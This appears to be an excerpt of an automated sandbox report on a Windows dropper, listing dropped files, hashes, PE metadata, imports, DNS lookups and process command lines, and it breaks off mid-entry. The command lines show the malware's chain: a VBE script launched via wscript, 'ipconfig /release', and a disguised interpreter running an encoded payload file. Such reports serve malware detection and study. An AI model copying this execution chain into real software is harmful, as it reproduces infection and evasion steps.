                                                                                                                                                                          Preview:Uo4E3Z7tyK..ToolbarConstants GuiDateTimePicker..Ov791uT433ag28M22S9zI815SwG688bb25O771N952n6kNm5V62Ko759pr64B0xWs5KM930076921K..ToolbarConstants DateTimeConstants..bi6M2DZf8xQHXx076Z3V6B4381J3293730ZY0aG27P4owJsPbo900c08fTDG9WHUtl840XGCvvCm97p04Qr49O4q19..FontConstants UpDownConstants..M9nwG09g2QJ09oj6uhP2ii81xs4W1443S6b3559wH1r89Y7eP162tUf6sfY3a2034u95P06680g358..ButtonConstants UpDownConstants..P5Q2HZ38196s3mf52k2LCoEnYj7M73P2V4s14n335689yQkA2114i6440TcTsD5MC5vAR64380d10IBrf42i55qJbWFdO56K9SUevxN4008vstI0O8b392fSx72o2c0a200k9WW6611y90EAPX3Xw39L4226b8759..ButtonConstants BorderConstants..

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\oqck\stke.jpg

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):571
                                                                                                                                                                          Entropy (8bit):5.5797013585600395
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:/HC1eTxrZxShOn8V9rfIrWum3deZ+3Sb/GM1BPc:/i1e1rf5n49rQWn3wcQBO
                                                                                                                                                                          MD5:701A40E797BF193BF1B078ACC8B08D8F
                                                                                                                                                                          SHA1:9AAA897C2EB6C09F60887020D6E0E6FB6793D1E7
                                                                                                                                                                          SHA-256:81883C3AF3BC76D202A2E2A499627B13D09CD7E3EBFF443BF854329BCFB9A3A9
                                                                                                                                                                          SHA-512:8E4946C3FC21D77F3BC267287D202804BDD38C501446EA008F65718A3BDBF5FC05AE3443336BF7A7D3CB60EB473B6CFD29F63D8DA1D8C43FBAB9A9B35E5BB136
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:4M4e123y813Q909y5o4L4sQv31qckhv715v3p88N22222pODEo3h69YXF4694361vw092IICqIgJD44aP7z4715o3T350RO84r0jsD664HhTeZ7vA5Z721L582LkS..FileConstants ColorConstants..jSGz6f4AGJ2k6ycRm79zywdOa5b640F01Z7w44xG61e8r11Z75qOyz64305NA9jV974y4222S5V5Q8W111yw0QM..ToolbarConstants ButtonConstants..3T6lSlO1kBqPR640E13B88B72GH9345392uId456352i0o29pVr508..BorderConstants DateTimeConstants..B7w33pKO5lfUU978g73buN8lCv4..DateTimeConstants FontConstants..9059j2hH51CowjY9cKcSn2X0p7335p172t2031wps95E76H7562DT3V52Fdel361931g0G714dwM68VUfw180Zxc9LBM954jhG64..ToolTipConstants TreeViewConstants..

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):126003968
                                                                                                                                                                          Entropy (8bit):7.032325966137812
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:196608:VuJdrXFG9geFdXFEq2JXYLsAU62B+HkeCKjdTuSuth8gidLIwyYXE24jcg1hSng3:u
                                                                                                                                                                          MD5:3F7DDC4ECBDAF26A3CA18881DBCB0444
                                                                                                                                                                          SHA1:87B7AD58BB268E450C8F6A3DA3A9BBF782F7293A
                                                                                                                                                                          SHA-256:2077070EC9BD352469129F6AA8CAF53BE0E4A9ED642BE8258203B428CE6FEC21
                                                                                                                                                                          SHA-512:A66A60C3034519442DE13C3A4D02F4135D54B1FE971A8B994C5CD525603B5C77B5EBF8276A665FE5B97D157C637587E981556C2C5CFD4504ADE37667059439C7
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Preview:..;....H...,u.L.{2.33..P...+qQFp$.k......,hL...1.%(.o.HH.....m...4K.F...@.%y.b........@j.D./.@'.O.h#.ncK>...g..\......l7...`!....N.....#.c.s..n..@...r).2.......(....4. .l...........0.(....,...>...F....1.Bq..........x.....y.~..9....}/.\....u..go..8.~.j.e.......*pq..:....*z..Q.B.@..6_.. ..........V..}...8h@@.b.c...K.n..}.u.uF.}I.....qH.$:Z1.=........*....{..b`.X.......Y...?dz..3XA4....+...e...G.B_E.].I..?.........5W.|.....J....P1.R.s...!...e..3.F.Z....f.q_.!..y...fw......'.@.'D.K..O.....`.{........{..M....y!...........jE*....p.9......X$.G.'....f.Y....$..V....{N......6.l.$..$.O....r.B..4H!.............*.C..36N........}...X.+.....Z....."..9....y....[9h..sQhA.w..3..z.A,.<....f......y..A....^p..L.c+....?t+....%S=3_g.6.i..{.d8.'2.k*Lq[....^"...O.h.....s/...<.1A;.4.5=hA..........;aa....2.t.c.c.....F.K.c.h.6.8.8.w.H.R.N.y.0.G.8.2.f.a.6.W.l......4.6...U/1R?.b$..n...5@.......8.1.M.4.d.1.B.m.i.C.s.X.6.8.x.6.7.3.5.u.T.8.5.2.1.N.9.t.R.4.9.B.7.1.s.4.c.j.

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\oqck\uauxqmpgfc.ppt

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:modified
                                                                                                                                                                          Size (bytes):517
                                                                                                                                                                          Entropy (8bit):5.63557700637518
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:cd1SzN8jzwOsy6prpGbfGSEybsw8RedLjPERsASXmv:cizVOMrpGbfGFGeRuEAWv
                                                                                                                                                                          MD5:FF1863DA6E6FD356E9EB8B8A2D2C5B12
                                                                                                                                                                          SHA1:10B8480E705597FB75BCA8C23ED0739B49500A8B
                                                                                                                                                                          SHA-256:6FBA20CB3849CF46B768F3BA627B3673D2C4B3B66AD2E994D245024C4E729366
                                                                                                                                                                          SHA-512:28B019D426893E2ACD7526FCB6B09575A904AA3B06AB4F34588C455D4394DED61905F0A2A01A6FE1DD1053562A3F2C181719310F260A61E62D4E3AAD996C998B
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:K75x8q9NtB50320T004H5mm2bfhu8LrSxM96L6680os0Ew1i71K6rTuDjgmq1P9x48KlM5uuq961sAmlDYAK23JQ16Kp3a0KTrw27rM69M91Hg56Lmm0Us7jPNpx0fGOSl72f9r8R90HA10T926R2q8801U..ToolbarConstants ToolTipConstants..7h6dCeH6F9A1518Ule16d2kd0016uXhz8W96ui326688RQ6q5673x91Q8G4I5I8VU4z59cyX5Pj..ButtonConstants ToolTipConstants..i6T20z4ldGcO250jK8z125DexY491zz2Yp6o8DEJKjP0070Gn1Tl89dW8q382s2..GuiDateTimePicker TreeViewConstants..7nKaUWw9I016671K43N5k51V14ZeNSj308671fD8i01P45pv1M83nudu2D6jC43xa283gk00M..GuiDateTimePicker GuiDateTimePicker..

                                                                                                                                                                          C:\Users\user\temp\drafggp.mp2

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):82
                                                                                                                                                                          Entropy (8bit):4.912387450178842
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:YRRvuf0nNp9JlC9hRGdYPZydV/OR/:Av7hoGpdV/OR/
                                                                                                                                                                          MD5:9A92712A859FFE6FF38F1D0D648F0722
                                                                                                                                                                          SHA1:20487A21C16820EDC855294F46E09BCE0A80C8FD
                                                                                                                                                                          SHA-256:91922CDC2C5D62252CA87D21C63430CD15BB0A03246D2514B7C4E87B9CE6F097
                                                                                                                                                                          SHA-512:4B33BA553CAE489AA233DD6CDE044D1443E13C685FBED7402F1FD494CDACC1F522023B0A20F01FF2AFEC16B142BE949C82BCA3195B27AD5A32E740D69D58A160
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:[S3tt!ng]..stpths=%temp%..Key=WindowsUpdate..Dir3ctory=oqck..ExE_c=dmqiuorkt.mp2..

                                                                                                                                                                          Static File Info

                                                                                                                                                                          General

                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Entropy (8bit):7.817350544572259
                                                                                                                                                                          TrID:
                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                          File name:FX6KTgnipP.exe
                                                                                                                                                                          File size:1'330'396 bytes
                                                                                                                                                                          MD5:09ac9eae3546e42f6bbcc605242133d0
                                                                                                                                                                          SHA1:ca07478bd504d2c690948e9c21771ec5ac4de018
                                                                                                                                                                          SHA256:6d414885d7f75777705948ed9a7134421d7cc2eabb4c4591b913864e8642850a
                                                                                                                                                                          SHA512:6a4925672c5002005e590ec4fb731c300db2db750a8933479e709f2ed28fd0100725f92da8b0162b2bd0936a9b2dac5e729674e39b68bb03af11ca2348fb2f76
                                                                                                                                                                          SSDEEP:24576:iN/BUBb+tYjBFHk+/qKEKhkiM70SrdO8jO2MHoXiM0hD6di/Aea:CpUlRhkIJm08OaEIXiM0hDTY
                                                                                                                                                                          TLSH:80551202BBC48473D17215325BB29715197D7D615FA18A8B63E038BEAB319C2D732FA3
                                                                                                                                                                          File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......v..p2.b#2.b#2.b#.E.#?.b#.E.#..b#.E.#*.b#...#0.b#..f"!.b#..a"*.b#..g"..b#;..#9.b#;..#5.b#2.c#,.b#..g"..b#..b"3.b#...#3.b#..`"3.b

                                                                                                                                                                          File Icon

                                                                                                                                                                          Icon Hash:3371f1a5e1534a33

                                                                                                                                                                          Static PE Info

                                                                                                                                                                          General

                                                                                                                                                                          Entrypoint:0x4265d0
                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                          Time Stamp:0x6640971F [Sun May 12 10:17:03 2024 UTC]
                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                          OS Version Major:5
                                                                                                                                                                          OS Version Minor:1
                                                                                                                                                                          File Version Major:5
                                                                                                                                                                          File Version Minor:1
                                                                                                                                                                          Subsystem Version Major:5
                                                                                                                                                                          Subsystem Version Minor:1
                                                                                                                                                                          Import Hash:99ee65c2db82c04251a5c24f214c8892

                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                          Instruction
                                                                                                                                                                          call 00007FD184818B0Bh
                                                                                                                                                                          jmp 00007FD18481848Dh
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          push ecx
                                                                                                                                                                          lea ecx, dword ptr [esp+08h]
                                                                                                                                                                          sub ecx, eax
                                                                                                                                                                          and ecx, 0Fh
                                                                                                                                                                          add eax, ecx
                                                                                                                                                                          sbb ecx, ecx
                                                                                                                                                                          or eax, ecx
                                                                                                                                                                          pop ecx
                                                                                                                                                                          jmp 00007FD184817B3Fh
                                                                                                                                                                          push ecx
                                                                                                                                                                          lea ecx, dword ptr [esp+08h]
                                                                                                                                                                          sub ecx, eax
                                                                                                                                                                          and ecx, 07h
                                                                                                                                                                          add eax, ecx
                                                                                                                                                                          sbb ecx, ecx
                                                                                                                                                                          or eax, ecx
                                                                                                                                                                          pop ecx
                                                                                                                                                                          jmp 00007FD184817B29h
                                                                                                                                                                          push ebp
                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                          sub esp, 0Ch
                                                                                                                                                                          lea ecx, dword ptr [ebp-0Ch]
                                                                                                                                                                          call 00007FD18480B069h
                                                                                                                                                                          push 0044634Ch
                                                                                                                                                                          lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                          push eax
                                                                                                                                                                          call 00007FD184819337h
                                                                                                                                                                          int3
                                                                                                                                                                          jmp 00007FD18481F06Eh
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          push 004293C0h
                                                                                                                                                                          push dword ptr fs:[00000000h]
                                                                                                                                                                          mov eax, dword ptr [esp+10h]
                                                                                                                                                                          mov dword ptr [esp+10h], ebp
                                                                                                                                                                          lea ebp, dword ptr [esp+10h]
                                                                                                                                                                          sub esp, eax
                                                                                                                                                                          push ebx
                                                                                                                                                                          push esi
                                                                                                                                                                          push edi
                                                                                                                                                                          mov eax, dword ptr [00449778h]
                                                                                                                                                                          xor dword ptr [ebp-04h], eax
                                                                                                                                                                          xor eax, ebp
                                                                                                                                                                          push eax
                                                                                                                                                                          mov dword ptr [ebp-18h], esp
                                                                                                                                                                          push dword ptr [ebp-08h]
                                                                                                                                                                          mov eax, dword ptr [ebp-04h]
                                                                                                                                                                          mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                          mov dword ptr [ebp-08h], eax
                                                                                                                                                                          lea eax, dword ptr [ebp-10h]
                                                                                                                                                                          mov dword ptr fs:[00000000h], eax
                                                                                                                                                                          ret
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          mov ecx, dword ptr [ebp-10h]
                                                                                                                                                                          mov dword ptr fs:[00000000h], ecx
                                                                                                                                                                          pop ecx
                                                                                                                                                                          pop edi
                                                                                                                                                                          pop edi
                                                                                                                                                                          pop esi
                                                                                                                                                                          pop ebx
                                                                                                                                                                          mov esp, ebp
                                                                                                                                                                          pop ebp
                                                                                                                                                                          push ecx
                                                                                                                                                                          ret
                                                                                                                                                                          push ebp
                                                                                                                                                                          mov ebp, esp

                                                                                                                                                                          Rich Headers

                                                                                                                                                                          Programming Language:
                                                                                                                                                                          • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                          • [IMP] VS2008 SP1 build 30729

                                                                                                                                                                          Data Directories

                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x47d700x34.rdata
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x47da40x50.rdata
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x580000x17ee4.rsrc
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x700000x2afc.reloc
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x445800x54.rdata
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x446000x18.rdata
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3ec580x40.rdata
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x3c0000x280.rdata
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x4722c0x120.rdata
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                          Sections

                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                          .text0x10000x3a32c0x3a400e320764e1b3c816ba80aeb820cb8a274False0.581381605418455data6.685359764265178IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                          .rdata0x3c0000xcbf80xcc0047c3be3304bfdfb2a778f355849d1c3fFalse0.4439529718137255data5.167069652624378IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                          .data0x490000xd7e00x12006335f9314c2900dccb530e151f1b1ee8False0.3956163194444444data4.0290550032041IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                          .didat0x570000x1a80x200232a8fe82993b55cefe09cffc39a79b0False0.462890625data3.5080985761326375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                          .rsrc0x580000x17ee40x180007a6f4fdc915a9e791c0d436729708e3aFalse0.7992757161458334data7.356836112369401IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                          .reloc0x700000x2afc0x2c0098fd4bc572f87a21f69dc57f720a6dbcFalse0.75data6.617141671767599IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                          Resources

                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                          PNG0x587040xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                                                                                                                                          PNG0x5924c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                                                                                                                                          RT_ICON0x5a7f80x668Device independent bitmap graphic, 48 x 96 x 4, image size 11520.374390243902439
                                                                                                                                                                          RT_ICON0x5ae600x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 5120.4435483870967742
                                                                                                                                                                          RT_ICON0x5b1480x128Device independent bitmap graphic, 16 x 32 x 4, image size 1280.5608108108108109
                                                                                                                                                                          RT_ICON0x5b2700xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors0.6396588486140725
                                                                                                                                                                          RT_ICON0x5c1180x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.7256317689530686
                                                                                                                                                                          RT_ICON0x5c9c00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.4624277456647399
                                                                                                                                                                          RT_ICON0x5cf280xcdffPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9972693656964066
                                                                                                                                                                          RT_ICON0x69d280x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.5239626556016598
                                                                                                                                                                          RT_ICON0x6c2d00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.6015478424015009
                                                                                                                                                                          RT_ICON0x6d3780x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.7783687943262412
                                                                                                                                                                          RT_DIALOG0x6d7e00x286dataEnglishUnited States0.5092879256965944
                                                                                                                                                                          RT_DIALOG0x6da680x13adataEnglishUnited States0.60828025477707
                                                                                                                                                                          RT_DIALOG0x6dba40xecdataEnglishUnited States0.6991525423728814
                                                                                                                                                                          RT_DIALOG0x6dc900x12edataEnglishUnited States0.5927152317880795
                                                                                                                                                                          RT_DIALOG0x6ddc00x338dataEnglishUnited States0.45145631067961167
                                                                                                                                                                          RT_DIALOG0x6e0f80x252dataEnglishUnited States0.5757575757575758
                                                                                                                                                                          RT_STRING0x6e34c0x1e2dataEnglishUnited States0.3900414937759336
                                                                                                                                                                          RT_STRING0x6e5300x1ccdataEnglishUnited States0.4282608695652174
                                                                                                                                                                          RT_STRING0x6e6fc0x1b8dataEnglishUnited States0.45681818181818185
                                                                                                                                                                          RT_STRING0x6e8b40x146dataEnglishUnited States0.5153374233128835
                                                                                                                                                                          RT_STRING0x6e9fc0x46cdataEnglishUnited States0.3454063604240283
                                                                                                                                                                          RT_STRING0x6ee680x166dataEnglishUnited States0.49162011173184356
                                                                                                                                                                          RT_STRING0x6efd00x152dataEnglishUnited States0.5059171597633136
                                                                                                                                                                          RT_STRING0x6f1240x10adataEnglishUnited States0.49624060150375937
                                                                                                                                                                          RT_STRING0x6f2300xbcdataEnglishUnited States0.6329787234042553
                                                                                                                                                                          RT_STRING0x6f2ec0x1c0dataEnglishUnited States0.5178571428571429
                                                                                                                                                                          RT_STRING0x6f4ac0x250dataEnglishUnited States0.44256756756756754
                                                                                                                                                                          RT_GROUP_ICON0x6f6fc0x92data0.6438356164383562
                                                                                                                                                                          RT_MANIFEST0x6f7900x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                                                                                                                                                          Imports

                                                                                                                                                                          DLLImport
                                                                                                                                                                          KERNEL32.dllLocalFree, GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, HeapReAlloc, LCMapStringW, FindFirstFileExA, FindNextFileA
                                                                                                                                                                          OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                                                                                                                          gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                                                                                                                                                          Possible Origin

                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                          EnglishUnited States

                                                                                                                                                                          Network Behavior

                                                                                                                                                                          DNS Answers

                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                          Dec 5, 2024 19:01:53.145333052 CET1.1.1.1192.168.2.90xbacaNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                          Dec 5, 2024 19:01:53.145333052 CET1.1.1.1192.168.2.90xbacaNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false

                                                                                                                                                                          Statistics

                                                                                                                                                                          CPU Usage

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          Memory Usage

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                          Behavior

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          System Behavior

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:0
                                                                                                                                                                          Start time:13:01:56
                                                                                                                                                                          Start date:05/12/2024
                                                                                                                                                                          Path:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\FX6KTgnipP.exe"
                                                                                                                                                                          Imagebase:0x240000
                                                                                                                                                                          File size:1'330'396 bytes
                                                                                                                                                                          MD5 hash:09AC9EAE3546E42F6BBCC605242133D0
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:2
                                                                                                                                                                          Start time:13:02:01
                                                                                                                                                                          Start date:05/12/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe"
                                                                                                                                                                          Imagebase:0xe00000
                                                                                                                                                                          File size:147'456 bytes
                                                                                                                                                                          MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:3
                                                                                                                                                                          Start time:13:02:11
                                                                                                                                                                          Start date:05/12/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /release
                                                                                                                                                                          Imagebase:0xc50000
                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:4
                                                                                                                                                                          Start time:13:02:11
                                                                                                                                                                          Start date:05/12/2024
                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                          Imagebase:0x7ff70f010000
                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:5
                                                                                                                                                                          Start time:13:02:11
                                                                                                                                                                          Start date:05/12/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c dmqiuorkt.mp2 tdggoffi.bin
                                                                                                                                                                          Imagebase:0xc50000
                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:6
                                                                                                                                                                          Start time:13:02:11
                                                                                                                                                                          Start date:05/12/2024
                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
